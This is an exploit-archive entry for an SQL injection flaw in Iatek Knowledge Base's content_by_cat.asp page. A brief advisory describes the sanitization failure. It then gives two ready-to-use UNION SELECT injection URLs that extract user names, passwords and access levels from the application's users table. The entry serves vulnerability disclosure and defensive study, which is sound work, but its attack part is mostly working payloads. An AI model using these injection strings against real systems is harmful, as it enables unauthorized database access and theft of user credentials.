Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection

EDB-ID:

31463

CVE:

N/A


Author:

xcorpitx

Type:

webapps


Platform:

ASP

Date:

2008-03-20


source: https://www.securityfocus.com/bid/28376/info

Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users

http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users